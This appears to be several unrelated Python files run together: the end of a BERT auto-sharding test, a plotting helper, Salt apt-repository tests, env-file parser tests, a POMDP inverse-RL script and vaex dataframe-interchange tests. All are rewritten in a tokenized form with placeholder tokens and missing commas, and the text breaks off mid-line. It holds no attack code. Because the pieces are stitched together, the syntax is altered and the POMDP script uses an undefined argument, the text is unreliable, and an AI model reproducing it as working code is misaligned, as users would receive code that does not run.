<for_stmt>i,mesh_shape enumerate([(4 1) (1 4)])<block_start>device_mesh=self.get_device_mesh(mesh_shape [1 1] [1 1])<line_sep>optimizer,hlo_ir,objective=self.run_bert_layers(batch_size seq_len num_layers hidden_size num_heads deterministic use_remat device_mesh)<line_sep>expected=(num_layers<times>6-1)<times>device_mesh.all_reduce_cost(batch_size<times>seq_len<times>hidden_size<times>4 i)<line_sep>assert_close(objective expected)<line_sep>n_total,n_all_reduce,n_all_gather,n_reduce_scatter,_=(count_communication_primitives(hlo_ir))<assert_stmt>n_total<eq>num_layers<times>6-1<assert_stmt>n_all_reduce<eq>num_layers<times>6-1<assert_stmt>n_total<eq>n_all_reduce<block_end><block_end><block_end><def_stmt>suite <block_start>suite=unittest.TestSuite()<def_stmt>add name<block_start>suite.addTest(AutoShardingAttentionTest(name))<block_end>add("test_bert_layer_data_parallel")<line_sep>add("test_bert_layer_model_parallel")<line_sep>add("test_bert_layer_2d_mesh")<line_sep>add("test_bert_layer_force_batch_dim_mapping")<line_sep>add("test_embedding_2d_mesh")<line_sep>add("test_bert_mlm_data_parallel")<line_sep>add("test_bert_mlm_model_parallel")<line_sep>add("test_bert_mlm_2d_mesh")<line_sep>add("test_bert_layer_data_parallel_reduce_scatter")<line_sep>add("test_bert_layer_model_parallel_reduce_scatter")<line_sep>add("test_bert_layer_2d_mesh_reduce_scatter")<line_sep>add("test_bert_mlm_data_parallel_reduce_scatter")<line_sep>add("test_bert_mlm_model_parallel_reduce_scatter")<line_sep>add("test_bert_mlm_2d_mesh_reduce_scatter")<line_sep>add("test_bert_mlm_data_parallel_reduce_scatter_zero_3")<line_sep>add("test_bert_layer_model_parallel_remat")<line_sep><return>suite<block_end><if_stmt>__name__<eq>"__main__"<block_start>runner=unittest.TextTestRunner()<line_sep>runner.run(suite())<block_end> |
"""
This module provides plotting support in iPython.
"""<import_from_stmt>functools wraps<import_stmt>matplotlib.pyplot<as>plt<line_sep>__all__=['peek_show' "axis_labels_from_ctype"]<def_stmt>peek_show func<block_start>"""
A decorator to place on ``peek()`` methods to show the figure.
The ``peek()`` method should return the figure then this method will
attempt to show it in the correct way. This decorator will not return the
figure to the user.
"""<line_sep>@wraps(func)<def_stmt>show_figure *args **kwargs<block_start>_=func(*args **kwargs)<line_sep>plt.show()<block_end><return>show_figure<block_end><def_stmt>axis_labels_from_ctype ctype unit<block_start>"""
Returns axis labels for the given coordinate type and unit.
Parameters
----------
ctype: `str`
Coordinate type.
unit: `str`, `None`
Required unit. If `None` no unit is added to the label.
Returns
-------
`str`
"Axis Label [Unit]"
"""<line_sep>ctype_short=ctype[:4]<line_sep>labels={'HGLN':f'Heliographic Longitude' 'CRLN':f'Carrington Longitude' 'HPLN':f'Helioprojective Longitude (Solar-X)' 'SOLX':f'Heliocentric X' 'HGLT':f'Latitude' 'CRLT':f'Latitude' 'HPLT':f'Helioprojective Latitude (Solar-Y)' 'SOLY':f'Heliocentric Y'}<line_sep>label=labels.get(ctype_short f"{ctype}")<if_stmt>unit<is><not><none><block_start>label<augadd>f' [{unit}]'<block_end><return>label<block_end> |
<import_stmt>pathlib<import_stmt>shutil<import_stmt>pytest<import_stmt>salt.exceptions<import_stmt>salt.modules.aptpkg<as>aptpkg<import_stmt>salt.modules.cmdmod<as>cmd<import_stmt>salt.modules.file<as>file<import_stmt>salt.utils.files<import_stmt>salt.utils.stringutils<import_from_stmt>tests.support.mock Mock patch<line_sep>pytestmark=[pytest.mark.skip_if_binaries_missing("apt-cache" "grep") ]<line_sep>@pytest.fixture<def_stmt>configure_loader_modules minion_opts<block_start><return>{aptpkg:{"__salt__":{"cmd.run_all":cmd.run_all "cmd.run":cmd.run "file.replace":file.replace "file.append":file.append "file.grep":file.grep } "__opts__":minion_opts } file:{"__salt__":{"cmd.run_all":cmd.run_all} "__utils__":{"files.is_text":salt.utils.files.is_text "stringutils.get_diff":salt.utils.stringutils.get_diff } "__opts__":minion_opts } }<block_end>@pytest.fixture()<def_stmt>revert_repo_file tmp_path<block_start><try_stmt><block_start>repo_file=pathlib.Path("/etc")/"apt"/"sources.list"<line_sep>backup=tmp_path/"repo_backup"<line_sep># make copy of repo file
shutil.copy(str(repo_file) str(backup))<line_sep><yield><block_end><finally_stmt># revert repo file
<block_start>shutil.copy(str(backup) str(repo_file))<line_sep>aptpkg.refresh_db()<block_end><block_end><def_stmt>get_current_repo multiple_comps=<false><block_start>"""
Get a repo currently in sources.list
multiple_comps:
Search for a repo that contains multiple comps.
For example: main, restricted
"""<with_stmt>salt.utils.files.fopen("/etc/apt/sources.list")<as>fp<block_start><for_stmt>line fp<block_start><if_stmt>line.startswith("#")<block_start><continue><block_end><if_stmt>"ubuntu.com"<in>line<or>"debian.org"<in>line<block_start>test_repo=line.strip()<line_sep>comps=test_repo.split()[3:]<if_stmt>multiple_comps<block_start><if_stmt>len(comps)<g>1<block_start><break><block_end><block_end><else_stmt><block_start><break><block_end><block_end><block_end><block_end><return>test_repo comps<block_end><def_stmt>test_list_repos <block_start>"""
Test aptpkg.list_repos
"""<line_sep>ret=aptpkg.list_repos()<line_sep>repos=[x<for>x ret<if>"http"<in>x]<for_stmt>repo repos<block_start>check_repo=ret[repo][0]<for_stmt>key ["comps" "dist" "uri" "line" "architectures" "file" "type" ]<block_start><assert_stmt>key<in>check_repo<block_end><assert_stmt>pathlib.Path(check_repo["file"]).is_file()<assert_stmt>check_repo["dist"]<in>check_repo["line"]<if_stmt>isinstance(check_repo["comps"] list)<block_start><assert_stmt>" ".join(check_repo["comps"])<in>check_repo["line"]<block_end><else_stmt><block_start><assert_stmt>check_repo["comps"]<in>check_repo["line"]<block_end><block_end><block_end><def_stmt>test_get_repos <block_start>"""
Test aptpkg.get_repos
"""<line_sep>test_repo,comps=get_current_repo()<if_stmt><not>test_repo<block_start>pytest.skip("Did not detect an apt repo")<block_end>exp_ret=test_repo.split()<line_sep>ret=aptpkg.get_repo(repo=test_repo)<assert_stmt>ret["type"]<eq>exp_ret[0]<assert_stmt>ret["uri"]<eq>exp_ret[1]<assert_stmt>ret["dist"]<eq>exp_ret[2]<assert_stmt>ret["comps"]<eq>exp_ret[3:]<assert_stmt>ret["file"]<eq>"/etc/apt/sources.list"<block_end><def_stmt>test_get_repos_multiple_comps <block_start>"""
Test aptpkg.get_repos when multiple comps
exist in repo.
"""<line_sep>test_repo,comps=get_current_repo(multiple_comps=<true>)<if_stmt><not>test_repo<block_start>pytest.skip("Did not detect an ubuntu repo")<block_end>exp_ret=test_repo.split()<line_sep>ret=aptpkg.get_repo(repo=test_repo)<assert_stmt>ret["type"]<eq>exp_ret[0]<assert_stmt>ret["uri"]<eq>exp_ret[1]<assert_stmt>ret["dist"]<eq>exp_ret[2]<assert_stmt>ret["comps"]<eq>exp_ret[3:]<block_end><def_stmt>test_get_repos_doesnot_exist <block_start>"""
Test aptpkg.get_repos when passing a repo
that does not exist
"""<for_stmt>test_repo ["doesnotexist" "deb http://archive.ubuntu.com/ubuntu/ focal-backports compdoesnotexist" ]<block_start>ret=aptpkg.get_repo(repo=test_repo)<assert_stmt><not>ret<block_end><block_end>@pytest.mark.destructive_test<def_stmt>test_del_repo revert_repo_file<block_start>"""
Test aptpkg.del_repo when passing repo
that exists. And checking correct error
is returned when it no longer exists.
"""<line_sep>test_repo,comps=get_current_repo()<line_sep>ret=aptpkg.del_repo(repo=test_repo)<assert_stmt>"Repo '{}' has been removed".format(test_repo)<with_stmt>pytest.raises(salt.exceptions.CommandExecutionError)<as>exc<block_start>ret=aptpkg.del_repo(repo=test_repo)<block_end><assert_stmt>"Repo {} doesn't exist".format(test_repo)<in>exc.value.message<block_end><def_stmt>test_expand_repo_def <block_start>"""
Test aptpkg.expand_repo_def when the repo exists.
"""<line_sep>test_repo,comps=get_current_repo()<line_sep>ret=aptpkg.expand_repo_def(repo=test_repo)<for_stmt>key ["comps" "dist" "uri" "line" "architectures" "file" "type" ]<block_start><assert_stmt>key<in>ret<assert_stmt>pathlib.Path(ret["file"]).is_file()<assert_stmt>ret["dist"]<in>ret["line"]<if_stmt>isinstance(ret["comps"] list)<block_start><for_stmt>comp ret["comps"]<block_start><assert_stmt>comp<in>ret["line"]<block_end><block_end><else_stmt><block_start><assert_stmt>ret["comps"]<in>ret["line"]<block_end><block_end><block_end>@pytest.mark.destructive_test<def_stmt>test_mod_repo revert_repo_file<block_start>"""
Test aptpkg.mod_repo when the repo exists.
"""<line_sep>test_repo,comps=get_current_repo()<line_sep>msg="This is a test"<with_stmt>patch.dict(aptpkg.__salt__ {"config.option":Mock()})<block_start>ret=aptpkg.mod_repo(repo=test_repo comments=msg)<block_end><assert_stmt>sorted(ret[list(ret.keys())[0]]["comps"])<eq>sorted(comps)<line_sep>ret=file.grep("/etc/apt/sources.list" msg)<assert_stmt>"#{}".format(msg)<in>ret["stdout"]<block_end>@pytest.mark.destructive_test<def_stmt>test_mod_repo_no_file tmp_path revert_repo_file<block_start>"""
Test aptpkg.mod_repo when the file does not exist.
It should create the file.
"""<line_sep>test_repo,comps=get_current_repo()<line_sep>test_file=str(tmp_path/"test_repo")<with_stmt>patch.dict(aptpkg.__salt__ {"config.option":Mock()})<block_start>ret=aptpkg.mod_repo(repo=test_repo file=test_file)<block_end><with_stmt>salt.utils.files.fopen(test_file "r")<as>fp<block_start>ret=fp.read()<block_end><assert_stmt>test_repo.split()[1]<in>ret.strip()<for_stmt>comp comps<block_start><assert_stmt>comp<in>ret<block_end><block_end> |
<import_from_stmt>poethepoet.envfile parse_env_file<import_stmt>pytest<line_sep>valid_examples=[("""
# empty
""" {} ) ("""
# single word values
WORD=something
WORD_WITH_HASH=some#thing
NUMBER=0
EMOJI=😃😃
DOUBLE_QUOTED_WORD="something"
SINGLE_QUOTED_WORD='something'
""" {"WORD":"something" "WORD_WITH_HASH":"some#thing" "NUMBER":"0" "EMOJI":"😃😃" "DOUBLE_QUOTED_WORD":"something" "SINGLE_QUOTED_WORD":"something" } ) ("""
# multiword values
WORD=some\\ thing # and trailing comments
DOUBLE_QUOTED_WORD="some thing"
SINGLE_QUOTED_WORD='some thing'
""" {"WORD":r"some thing" "DOUBLE_QUOTED_WORD":"some thing" "SINGLE_QUOTED_WORD":"some thing" } ) ("""
# values with line breaks
WORD=some\\
thing
DOUBLE_QUOTED_WORD="some
thing"
SINGLE_QUOTED_WORD='some
thing'
""" {"WORD":"some\nthing" "DOUBLE_QUOTED_WORD":"some\n thing" "SINGLE_QUOTED_WORD":"some\n thing" } ) ("""
# without linebreak between vars
FOO=BAR BAR=FOO
""" {"FOO":"BAR" "BAR":"FOO"} ) ("""
# with semicolons
; FOO=BAR;BAR=FOO ;
;
BAZ="2;'2"#;
\tQUX=3\t;
""" {"FOO":"BAR" "BAR":"FOO" "BAZ":"2;'2#" "QUX":"3"} ) (r"""
# with extra backslashes
FOO=a\\\ b
BAR='a\\\ b'
BAZ="a\\\ b"
""" {"FOO":r"a\ b" "BAR":r"a\\\ b" "BAZ":r"a\ b"} ) (# a value with many parts and some empty vars
r"""FOO=a\\\ b'a\\\ b'"a\\\ b"#"#"'\'' ;'#;\t
BAR=
BAZ= # still empty
QUX=""" {"FOO":r"a\ ba\\\ ba\ b##\ ;#" "BAR":"" "BAZ":"" "QUX":""} ) # export keyword is allowed
("""export answer=42
export \t question=undefined
export\tdinner=chicken
""" {"answer":"42" "question":"undefined" "dinner":"chicken"} ) ]<line_sep>invalid_examples=["foo = bar" "foo =bar" "foo= bar" "foo\t=\tbar" "foo\t=bar" "foo=\tbar" "foo= 'bar" 'foo= "bar"' "foo" "foo;" "8oo=bar" "foo@=bar" '"foo@"=bar' "'foo@'=bar" r"foo\=bar" r"foo\==bar" r"export;foo=bar" r"export\nfoo=bar" ]<line_sep>@pytest.mark.parametrize("example" valid_examples)<def_stmt>test_parse_valid_env_files example<block_start><assert_stmt>parse_env_file(example[0])<eq>example[1]<block_end>@pytest.mark.parametrize("example" invalid_examples)<def_stmt>test_parse_invalid_env_files example<block_start><with_stmt>pytest.raises(ValueError)<block_start>parse_env_file(example)<block_end><block_end> |
"""
Package for DjangoWebProject1.
"""<line_sep> |
<import_stmt>argparse<import_stmt>dill<import_stmt>jax<import_stmt>numpy<as>np<import_stmt>pomdp<line_sep>pomdp.horizon=25<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--silent' action='store_true')<line_sep>parser.add_argument('--cont' action='store_true')<line_sep>parser.add_argument('--bias' action='store_true')<line_sep>args=parser.parse_args()<line_sep>key=jax.random.PRNGKey(0)<with_stmt>open('data/data{}-meta.obj'.format('-bias'<if>args.bias<else>'') 'rb')<as>f<block_start>data_meta=dill.load(f)<line_sep>S=data_meta['S']<line_sep>A=data_meta['A']<line_sep>Z=data_meta['Z']<block_end><with_stmt>open('data/data{}.obj'.format('-bias'<if>args.bias<else>'') 'rb')<as>f<block_start>data=dill.load(f)<block_end><def_stmt>log_pi alp bet b<block_start>res=np.zeros(A)<for_stmt>a range(A)<block_start><if_stmt>alp[a].size<eq>0<block_start>res[a]=-1e6<block_end><else_stmt><block_start>res[a]=bet<times>(alp[a]@b).max()<block_end><block_end><return>res-np.log(np.sum(np.exp(res)))<block_end><def_stmt>likelihood b0 T O alp<block_start>res=0<for_stmt>traj data<block_start>b=b0<for_stmt>a,z zip(traj['a'] traj['z'])<block_start>res<augadd>log_pi(alp 10 b)[a]<line_sep>b=O[a : z]<times>(T[: a :].T@b)<line_sep>b<augdiv>b.sum()<block_end><block_end><return>res<block_end><if_stmt>args.cont<block_start><with_stmt>open(args.output 'rb')<as>f<block_start>res=dill.load(f)<line_sep>key=res['key']<line_sep>b0,T,O,R=res['out'][-1]<block_end><block_end><else_stmt><block_start>res=dict()<line_sep>res['out']=list()<line_sep>key,*subkey=jax.random.split(key 4)<line_sep>b0=np.array(jax.random.dirichlet(subkey[0] np.ones(S)))<line_sep>T=np.array(jax.random.dirichlet(subkey[1] np.ones((S A S)) shape=(S A)))<line_sep>O=np.array(jax.random.dirichlet(subkey[1] np.ones((A S Z)) shape=(A S)))<line_sep>###
T=np.array([[[1 0] [1 0] [1 0]] [[0 1] [0 1] [0 1]]])<line_sep>O[:2 <ellipsis>]=np.array([[[1 0] [1 0]] [[0 1] [0 1]]])<line_sep>###
key,subkey=jax.random.split(key)<line_sep>R=np.array([[1 -1.5 0] [-1.5 1 0]])<times>.25<line_sep>R<augadd>.001<times>np.array(jax.random.normal(subkey shape=(S A)))<block_end>alp=pomdp.solve(S A Z b0 T O R)<line_sep>like=likelihood(b0 T O alp)<line_sep>rtio=0<line_sep>rtio_n=0<for_stmt>i range(len(res['out']) 1000)<block_start>_b0,_T,_O,_R=b0 T O R<line_sep>key,subkey=jax.random.split(key)<if_stmt>jax.random.choice(subkey [<true> <false>])<block_start><for_stmt>traj data<block_start>alp=[<none>]<times>(traj['tau']+1)<line_sep>alp[0]=b0<for_stmt>t range(traj['tau'])<block_start>alp[t+1]=O[traj['a'][t] : traj['z'][t]]<times>(T[: traj['a'][t] :].T@alp[t])<line_sep>alp[t+1]<augdiv>alp[t+1].sum()<block_end>bet=[<none>]<times>(traj['tau']+1)<line_sep>bet[-1]=np.ones(S)<for_stmt>t reversed(range(traj['tau']))<block_start>bet[t]=T[: traj['a'][t] :]@(O[traj['a'][t] : traj['z'][t]]<times>bet[t+1])<line_sep>bet[t]<augdiv>bet[t].sum()<block_end>gmm=[<none>]<times>(traj['tau']+1)<for_stmt>t range(traj['tau']+1)<block_start>gmm[t]=alp[t]<times>bet[t]<line_sep>gmm[t]<augdiv>gmm[t].sum()<block_end>traj['s']=[<none>]<times>(traj['tau']+1)<for_stmt>t range(traj['tau']+1)<block_start>key,subkey=jax.random.split(key)<line_sep>traj['s'][t]=jax.random.choice(subkey range(S) p=gmm[t])<block_end><block_end>dir_b0=np.ones(b0.shape)<line_sep>dir_T=np.ones(T.shape)<line_sep>dir_O=np.ones(O.shape)<for_stmt>traj data<block_start>dir_b0[traj['s'][0]]<augadd>1<for_stmt>t range(traj['tau'])<block_start>dir_T[traj['s'][t] traj['a'][t] traj['s'][t+1]]<augadd>1<block_end><for_stmt>t range(traj['tau'])<block_start>dir_O[traj['a'][t] traj['s'][t+1] traj['z'][t]]<augadd>1<block_end><block_end>###
key,subkey=jax.random.split(key)<line_sep>_b0=np.array(jax.random.dirichlet(subkey dir_b0))<if_stmt>args.bias<block_start>_b0=np.array([.5 .5])<block_end>_T=np.array([[[1 0] [1 0] [1 0]] [[0 1] [0 1] [0 1]]])<line_sep>_O=np.array([[[1 0] [1 0]] [[0 1] [0 1]] [[.5 .5] [.5 .5]]])<for_stmt>s range(S)<block_start>key,subkey=jax.random.split(key)<line_sep>_O[2 s :]=np.array(jax.random.dirichlet(subkey dir_O[2 s :]))<block_end><block_end><else_stmt><block_start>key,subkey=jax.random.split(key)<line_sep>_R=R+.001<times>np.array(jax.random.normal(subkey shape=(S A)))<block_end>_alp=pomdp.solve(S A Z _b0 _T _O _R)<line_sep>_like=likelihood(_b0 _T _O _alp)<line_sep>key,subkey=jax.random.split(key)<line_sep>unif=jax.random.uniform(subkey)<if_stmt>np.log(unif)<l>_like-like<block_start>b0,T,O,R=_b0 _T _O _R<line_sep>like=_like<block_end>rtio<augadd>1<if>like<eq>_like<else>0<line_sep>rtio_n<augadd>1<if_stmt><not>args.silent<block_start>print('i = {}, like = {}, {} ({})'.format(i like '*'<if>like<eq>_like<else>'-' rtio/rtio_n))<block_end>res['key']=key<line_sep>res['out'].append((b0 T O R))<if_stmt>(i+1)%100<eq>0<block_start><with_stmt>open('res/res{}-offpoirl.obj'.format('-bias'<if>args.bias<else>'') 'wb')<as>f<block_start>dill.dump(res f)<block_end><block_end><block_end><with_stmt>open('res/res{}-offpoirl.obj'.format('-bias'<if>args.bias<else>'') 'wb')<as>f<block_start>dill.dump(res f)<block_end> |
<import_stmt>numpy<as>np<import_stmt>pyarrow<as>pa<import_stmt>pytest<import_from_stmt>typing Any Optional Tuple Dict Iterable Sequence<line_sep>DataFrameObject=Any<line_sep>ColumnObject=Any<import_stmt>vaex<import_from_stmt>common *<import_from_stmt>vaex.dataframe_protocol _from_dataframe_to_vaex _DtypeKind _VaexBuffer _VaexColumn _VaexDataFrame<def_stmt>test_float_only df_factory<block_start>df=df_factory(x=[1.5 2.5 3.5] y=[9.2 10.5 11.8])<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df2.x.tolist()<eq>df.x.tolist()<assert_stmt>df2.y.tolist()<eq>df.y.tolist()<assert_stmt>df2.__dataframe__().get_column_by_name("x").null_count<eq>0<assert_stmt>df2.__dataframe__().get_column_by_name("y").null_count<eq>0<line_sep>assert_dataframe_equal(df.__dataframe__() df)<block_end><def_stmt>test_mixed_intfloat df_factory<block_start>df=df_factory(x=[1 2 0] y=[9.2 10.5 11.8])<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df2.x.tolist()<eq>df.x.tolist()<assert_stmt>df2.y.tolist()<eq>df.y.tolist()<assert_stmt>df2.__dataframe__().get_column_by_name("x").null_count<eq>0<assert_stmt>df2.__dataframe__().get_column_by_name("y").null_count<eq>0<line_sep>assert_dataframe_equal(df.__dataframe__() df)<block_end><def_stmt>test_mixed_intfloatbool df_factory<block_start>df=df_factory(x=np.array([<true> <true> <false>]) y=np.array([1 2 0]) z=np.array([9.2 10.5 11.8]))<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df2.x.tolist()<eq>df.x.tolist()<assert_stmt>df2.y.tolist()<eq>df.y.tolist()<assert_stmt>df2.z.tolist()<eq>df.z.tolist()<assert_stmt>df2.__dataframe__().get_column_by_name("x").null_count<eq>0<assert_stmt>df2.__dataframe__().get_column_by_name("y").null_count<eq>0<assert_stmt>df2.__dataframe__().get_column_by_name("z").null_count<eq>0<line_sep># Additionl tests for _VaexColumn
<assert_stmt>df2.__dataframe__().get_column_by_name("x")._allow_copy<eq><true><assert_stmt>df2.__dataframe__().get_column_by_name("x").size<eq>3<assert_stmt>df2.__dataframe__().get_column_by_name("x").offset<eq>0<assert_stmt>df2.__dataframe__().get_column_by_name("z").dtype[0]<eq>2# 2: float64
<assert_stmt>df2.__dataframe__().get_column_by_name("z").dtype[1]<eq>64# 64: float64
<assert_stmt>df2.__dataframe__().get_column_by_name("z").dtype<eq>(2 64 "<f8" "=")<with_stmt>pytest.raises(TypeError)<block_start><assert_stmt>df2.__dataframe__().get_column_by_name("y").describe_categorical<block_end><if_stmt>df2['y'].dtype.is_arrow<block_start><assert_stmt>df2.__dataframe__().get_column_by_name("y").describe_null<eq>(3 0)<block_end><else_stmt><block_start><assert_stmt>df2.__dataframe__().get_column_by_name("y").describe_null<eq>(0 <none>)<block_end>assert_dataframe_equal(df.__dataframe__() df)<block_end><def_stmt>test_mixed_missing df_factory_arrow<block_start>df=df_factory_arrow(x=np.array([<true> <none> <false> <none> <true>]) y=np.array([<none> 2 0 1 2]) z=np.array([9.2 10.5 <none> 11.8 <none>]))<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df.__dataframe__().metadata<eq>df2.__dataframe__().metadata<assert_stmt>df["x"].tolist()<eq>df2["x"].tolist()<assert_stmt><not>df2["x"].is_masked<assert_stmt>df2.__dataframe__().get_column_by_name("x").null_count<eq>2<assert_stmt>df["x"].dtype<eq>df2["x"].dtype<assert_stmt>df["y"].tolist()<eq>df2["y"].tolist()<assert_stmt><not>df2["y"].is_masked<assert_stmt>df2.__dataframe__().get_column_by_name("y").null_count<eq>1<assert_stmt>df["y"].dtype<eq>df2["y"].dtype<assert_stmt>df["z"].tolist()<eq>df2["z"].tolist()<assert_stmt><not>df2["z"].is_masked<assert_stmt>df2.__dataframe__().get_column_by_name("z").null_count<eq>2<assert_stmt>df["z"].dtype<eq>df2["z"].dtype<line_sep>assert_dataframe_equal(df.__dataframe__() df)<block_end><def_stmt>test_missing_from_masked df_factory_numpy<block_start>df=df_factory_numpy(x=np.ma.array([1 2 3 4 0] mask=[0 0 0 1 1] dtype=int) y=np.ma.array([1.5 2.5 3.5 4.5 0] mask=[<false> <true> <true> <true> <false>] dtype=float) z=np.ma.array([<true> <false> <true> <true> <true>] mask=[1 0 0 1 0] dtype=bool) )<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df.__dataframe__().metadata<eq>df2.__dataframe__().metadata<assert_stmt>df["x"].tolist()<eq>df2["x"].tolist()<assert_stmt><not>df2["x"].is_masked<assert_stmt>df2.__dataframe__().get_column_by_name("x").null_count<eq>2<assert_stmt>df["x"].dtype<eq>df2["x"].dtype<assert_stmt>df["y"].tolist()<eq>df2["y"].tolist()<assert_stmt><not>df2["y"].is_masked<assert_stmt>df2.__dataframe__().get_column_by_name("y").null_count<eq>3<assert_stmt>df["y"].dtype<eq>df2["y"].dtype<assert_stmt>df["z"].tolist()<eq>df2["z"].tolist()<assert_stmt><not>df2["z"].is_masked<assert_stmt>df2.__dataframe__().get_column_by_name("z").null_count<eq>2<assert_stmt>df["z"].dtype<eq>df2["z"].dtype<line_sep>assert_dataframe_equal(df.__dataframe__() df)<block_end><def_stmt>test_categorical <block_start>df=vaex.from_arrays(year=[2012 2013 2015 2019] weekday=[0 1 4 6])<line_sep>df=df.categorize("year" min_value=2012 max_value=2019)<line_sep>df=df.categorize("weekday" labels=["Mon" "Tue" "Wed" "Thu" "Fri" "Sat" "Sun"])<line_sep># Some detailed testing for correctness of dtype and null handling:
col=df.__dataframe__().get_column_by_name("year")<assert_stmt>col.dtype[0]<eq>_DtypeKind.CATEGORICAL<assert_stmt>col.describe_categorical<eq>(<false> <true> {0:2012 1:2013 2:2014 3:2015 4:2016 5:2017 6:2018 7:2019})<assert_stmt>col.describe_null<eq>(0 <none>)<assert_stmt>col.dtype<eq>(23 64 "u" "=")<line_sep>col2=df.__dataframe__().get_column_by_name("weekday")<assert_stmt>col2.dtype[0]<eq>_DtypeKind.CATEGORICAL<assert_stmt>col2.describe_categorical<eq>(<false> <true> {0:"Mon" 1:"Tue" 2:"Wed" 3:"Thu" 4:"Fri" 5:"Sat" 6:"Sun"})<assert_stmt>col2.describe_null<eq>(0 <none>)<assert_stmt>col2.dtype<eq>(23 64 "u" "=")<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df2["year"].tolist()<eq>[2012 2013 2015 2019]<assert_stmt>df2["weekday"].tolist()<eq>["Mon" "Tue" "Fri" "Sun"]<line_sep>assert_dataframe_equal(df.__dataframe__() df)<block_end><def_stmt>test_arrow_dictionary <block_start>indices=pa.array([0 1 0 1 2 0 1 2])<line_sep>dictionary=pa.array(["foo" "bar" "baz"])<line_sep>dict_array=pa.DictionaryArray.from_arrays(indices dictionary)<line_sep>df=vaex.from_arrays(x=dict_array)<line_sep># Some detailed testing for correctness of dtype and null handling:
col=df.__dataframe__().get_column_by_name("x")<assert_stmt>col.dtype[0]<eq>_DtypeKind.CATEGORICAL<assert_stmt>col.describe_categorical<eq>(<false> <true> {0:"foo" 1:"bar" 2:"baz"})<if_stmt>df['x'].dtype.is_arrow<block_start><assert_stmt>col.describe_null<eq>(3 0)<block_end><else_stmt><block_start><assert_stmt>col.describe_null<eq>(0 <none>)<block_end><assert_stmt>col.dtype<eq>(23 64 "u" "=")<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df2.x.tolist()<eq>df.x.tolist()<assert_stmt>df2.__dataframe__().get_column_by_name("x").null_count<eq>0<line_sep>assert_dataframe_equal(df.__dataframe__() df)<block_end><def_stmt>test_arrow_dictionary_missing <block_start>indices=pa.array([0 1 2 0 1] mask=np.array([0 1 1 0 0] dtype=bool))<line_sep>dictionary=pa.array(["aap" "noot" "mies"])<line_sep>dict_array=pa.DictionaryArray.from_arrays(indices dictionary)<line_sep>df=vaex.from_arrays(x=dict_array)<line_sep># Some detailed testing for correctness of dtype and null handling:
col=df.__dataframe__().get_column_by_name("x")<assert_stmt>col.dtype[0]<eq>_DtypeKind.CATEGORICAL<assert_stmt>col.describe_categorical<eq>(<false> <true> {0:"aap" 1:"noot" 2:"mies"})<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df2.x.tolist()<eq>df.x.tolist()<assert_stmt>df2.__dataframe__().get_column_by_name("x").null_count<eq>2<assert_stmt>df["x"].dtype.index_type<eq>df2["x"].dtype.index_type<line_sep>assert_dataframe_equal(df.__dataframe__() df)<block_end><def_stmt>test_string <block_start>df=vaex.from_dict({"A":["a" <none> "cdef" "" "g"]})<line_sep>col=df.__dataframe__().get_column_by_name("A")<assert_stmt>col._col.tolist()<eq>df.A.tolist()<assert_stmt>col.size<eq>5<assert_stmt>col.null_count<eq>1<assert_stmt>col.dtype[0]<eq>_DtypeKind.STRING<assert_stmt>col.describe_null<eq>(3 0)<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df2.A.tolist()<eq>df.A.tolist()<assert_stmt>df2.__dataframe__().get_column_by_name("A").null_count<eq>1<assert_stmt>df2.__dataframe__().get_column_by_name("A").describe_null<eq>(3 0)<assert_stmt>df2.__dataframe__().get_column_by_name("A").dtype[0]<eq>_DtypeKind.STRING<line_sep>df_sliced=df[1:]<line_sep>col=df_sliced.__dataframe__().get_column_by_name("A")<assert_stmt>col.size<eq>4<assert_stmt>col.null_count<eq>1<assert_stmt>col.dtype[0]<eq>_DtypeKind.STRING<assert_stmt>col.describe_null<eq>(3 0)<line_sep>df2=_from_dataframe_to_vaex(df_sliced.__dataframe__())<assert_stmt>df2.A.tolist()<eq>df_sliced.A.tolist()<assert_stmt>df2.__dataframe__().get_column_by_name("A").null_count<eq>1<assert_stmt>df2.__dataframe__().get_column_by_name("A").describe_null<eq>(3 0)<assert_stmt>df2.__dataframe__().get_column_by_name("A").dtype[0]<eq>_DtypeKind.STRING<block_end><def_stmt>test_no_mem_copy <block_start>strings=["a" "" "cdef" "" "g"]<line_sep># data for above string array
dbuf=np.array([97 99 100 101 102 103] dtype='uint8')<line_sep>obuf=np.array([0 1 1 5 5 6] dtype='int64')<line_sep>length=5<line_sep>buffers=[<none> pa.py_buffer(obuf) pa.py_buffer(dbuf)]<line_sep>s=pa.Array.from_buffers(pa.large_utf8() length buffers)<line_sep>x=np.arange(0 5)<line_sep>df=vaex.from_arrays(x=x s=s)<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<line_sep># primitive data
x[0]=999<assert_stmt>df2.x.tolist()<eq>[999 1 2 3 4]<line_sep># strings
<assert_stmt>df.s.tolist()<eq>strings<assert_stmt>df2.s.tolist()<eq>strings<line_sep># mutate the buffer data (which actually arrow and vaex both don't support/want)
strings[0]="b"<line_sep>dbuf[0]<augadd>1<assert_stmt>df.s.tolist()<eq>strings<assert_stmt>df2.s.tolist()<eq>strings<block_end><def_stmt>test_object <block_start>df=vaex.from_arrays(x=np.array([<none> <true> <false>]))<line_sep>col=df.__dataframe__().get_column_by_name("x")<assert_stmt>col._col.tolist()<eq>df.x.tolist()<assert_stmt>col.size<eq>3<with_stmt>pytest.raises(ValueError)<block_start><assert_stmt>col.dtype<block_end><with_stmt>pytest.raises(ValueError)<block_start><assert_stmt>col.describe_null<block_end><block_end><def_stmt>test_virtual_column <block_start>df=vaex.from_arrays(x=np.array([<true> <true> <false>]) y=np.array([1 2 0]) z=np.array([9.2 10.5 11.8]))<line_sep>df.add_virtual_column("r" "sqrt(y**2 + z**2)")<line_sep>df2=_from_dataframe_to_vaex(df.__dataframe__())<assert_stmt>df2.r.tolist()<eq>df.r.tolist()<block_end><def_stmt>test_VaexBuffer <block_start>x=np.ndarray(shape=(5 ) dtype=float 